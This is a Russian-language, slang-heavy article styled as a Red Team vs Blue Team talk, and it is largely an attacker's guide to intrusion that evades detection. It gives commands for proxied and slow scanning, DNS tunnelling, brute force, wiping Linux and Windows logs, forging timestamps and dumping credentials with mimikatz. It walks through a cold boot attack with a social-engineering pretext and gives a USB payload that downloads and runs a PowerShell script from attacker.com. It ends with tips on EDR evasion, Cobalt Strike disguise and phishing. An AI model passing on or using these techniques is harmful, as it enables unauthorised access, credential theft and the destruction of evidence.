Red Team vs Blue Team: жизнь на грани — как накрывают и как не попадаться
Йо, братан, садись поближе к терминалу, ща будем разбирать мясо темы: «Red Team vs Blue Team: жизнь на грани — как накрывают и как не попадаться». Мы с тобой в подвале, старые волки, знаем, как пахнет адреналин, когда SIEM орёт, а IDS мигает красным. Сегодня я расскажу, как Blue Team нас ловит, как мы их обходим, и что делать, когда надо ломать всё и сразу — от маскировки до cold boot атак. Погнали, как в старые добрые CTF’ы!
Как Blue Team нас накрывает: SIEM и IDS
Точка входа: Blue Team сидит на своих SIEM’ах (Splunk, QRadar) и IDS/IPS (Snort, Suricata). Их цель — поймать нас на горячем.
- Типичные срабатывания:
- Сканирование портов: Если лупишь
nmap -sS target.com
, IDS может заорать на аномальный трафик. Логи идут в SIEM, и Blue Team начинает копать. - Брутфорс: Попытки подбора паролей через
hydra
илиmedusa
генерят кучу неудачных логинов. SIEM триггерит на паттерн «много фейлов с одного IP». - C2-трафик: Если залили шелл и тянем команды через
msfconsole
, IDS может засечь подозрительный трафик на нестандартные порты (4444, например). - Аномалии: Blue Team смотрит на поведение в сети. Если ты залогинился в 3 утра из другой гео, жди, что начнут проверять.
- Сканирование портов: Если лупишь
- Что бросилось в глаза: SIEM часто завязан на корреляцию логов. Если ты оставляешь следы в
/var/log/auth.log
или Windows Event Log, они сложат два и два.
Вектор защиты Blue Team: Они настраивают правила на частые сигнатуры (например, Metasploit-пейлоады) и машинное обучение для выявления аномалий.
Как не попадаться: методы маскировки
Точка входа: Наша задача — быть тише воды. Обходим SIEM и IDS через маскировку и хитрости.
- Маскировка трафика:
- Используем Tor или цепочку прокси:
torsocks nmap -sS target.com
. Это скрывает наш IP. - Для C2-трафика юзаем HTTPS или DNS-туннелирование через
dnscat2
. Команда:dnscat2 client target.com 53
. Blue Team хрен заметит, что это не просто DNS-запросы. - Меняем User-Agent на легитимный:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" target.com
. IDS меньше триггерит на «обычный» браузер.
- Используем Tor или цепочку прокси:
- Снижение шума:
- Сканируем медленно с таймингами:
nmap -T2 -sS target.com
. Это снижает шанс срабатывания IDS. - Избегаем дефолтных пейлоадов Metasploit. Обфусцируем через
veil-evasion
или пишем свой шелл-код. - Для брутфорса юзаем маленькие списки паролей и рандомные задержки:
hydra -l user -P small_pass.txt -t 1 target.com ssh
.
- Сканируем медленно с таймингами:
- Стерилизация следов:
- Чистим логи после входа. На Linux:
echo "" > /var/log/auth.log
. На Windows:wevtutil cl System
(нужны админские права). - Меняем timestamps файлов, чтоб не палиться:
touch -t 202306010000 /path/to/file
. - Используем
mimikatz
для работы в памяти, не трогая диск:sekurlsa::logonpasswords
.
- Чистим логи после входа. На Linux:
Что бросилось в глаза: Blue Team часто не замечает медленный, распределённый трафик. Если растянуть атаку на дни и не жадничать, IDS молчит.
Вектор атаки: Маскируемся под легитимный трафик, работаем через доверенные протоколы (HTTPS, DNS), чистим следы сразу после компрометации.
Физический доступ: Cold Boot и всё и сразу
Точка входа: Когда удалёнка не катит, идём на физический доступ. Cold Boot атака — наш козырь, если надо выцепить ключи из памяти.
- Cold Boot Attack:
- Суть: RAM сохраняет данные даже после выключения, если быстро охладить. Понадобится баллончик со сжатым воздухом или жидкий азот.
- Шаги:
- Получаем доступ к тачке (например, через социалку: «Я из IT, надо проверить сервер»).
- Вырубаем питание, охлаждаем RAM (держим баллончик вверх дном, брызгаем на модули).
- Вытаскиваем RAM, вставляем в свою тачку с предустановленным софтом типа
memimage
. - Дампим память:
memimage -o dump.bin
. - Ищем ключи шифрования или пароли через
strings dump.bin | grep -i password
.
- Риски: Надо действовать быстро, данные в RAM держатся минуты. Blue Team может засечь физический доступ через камеры или охрану.
- Другие физические атаки:
- USB Rubber Ducky: Подключаем флешку, которая эмулирует клаву. Загружаем пейлоад за 10 секунд:
powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')
. - LAN Turtle: Втыкаем девайс в сеть, получаем удалённый доступ через SSH. Команда:
ssh root@lan-turtle-ip
.
- USB Rubber Ducky: Подключаем флешку, которая эмулирует клаву. Загружаем пейлоад за 10 секунд:
Что бросилось в глаза: Физический доступ — это 100% компрометация, если Blue Team не закрыла порты или не шифрует диски на уровне железа (BitLocker с TPM).
Вектор атаки: Если попали к железу, Cold Boot даёт ключи от дисков или VPN. Rubber Ducky или LAN Turtle — для быстрого внедрения в сеть. После этого уходим в тень, маскируем трафик.
Red Team vs Blue Team: игра в прятки
Точка входа: Это вечный бой. Blue Team строит защиту, мы ищем дыры. Их сила — в мониторинге и корреляции, наша — в хитрости и терпении.
- Их тактика: SIEM ловит на паттернах, IDS — на сигнатурах, EDR (Endpoint Detection and Response) — на поведении малвари.
- Наша тактика: Обфускация, низкий профиль, стерилизация. Если попались — меняем IP, юзаем новые C2-серверы, работаем через легитимные сервисы (Google Drive как C2, например).
Что бросилось в глаза: Blue Team часто реагирует с задержкой. Если не поднимать панику, можно сидеть в сети неделями, пока они не заметят.
Вектор атаки: Наша задача — бить точечно, не оставлять следов, уходить до первого алерта. Если Blue Team нас засекла, меняем тактику на лету, уходим на физический доступ или социалку.
Итог: жизнь на грани
Мы с тобой, братан, всегда на острие. Blue Team — это стена, но любая стена рушится, если знать, куда бить. От обхода SIEM через DNS-туннели до Cold Boot атак — у нас всегда есть план. Главное — не торопиться, не палиться и чистить за собой. Ща дам ещё пару идей, куда копать, если запахло жареным.
Советы
- Обфускация шеллов: Если C2-трафик палят, попробуй кастомные пейлоады через
Cobalt Strike
с Malleable C2 профилями. Пусть выглядит как легитимный трафик Amazon S3. - EDR-обход: Чекни актуальные техники обхода EDR на GitHub (например,
EDR-Telemetry-Killer
). Часто они не видят работу в памяти. - Социалка как запасной план: Если сеть закрыта, лезь к людям. Фишинг через фейковые звонки или письма всё ещё работает.
- Физический доступ 2.0: Если Cold Boot не катит, попробуй подмену BIOS или загрузку с live-USB (Kali Linux с persistence).
- Анализ логов Blue Team: Если попался, изучи, что именно триггерит их алерты (через утечки или инсайдеров), и подстрой тактику.
План атаки: начинаем с тихого проникновения, маскируемся под легитимный трафик, стерилизуем следы. Если Blue Team близко, уходим на физический доступ или переключаемся на социалку. Терминалы наготове, брат, давай рвём их защиту в клочья!
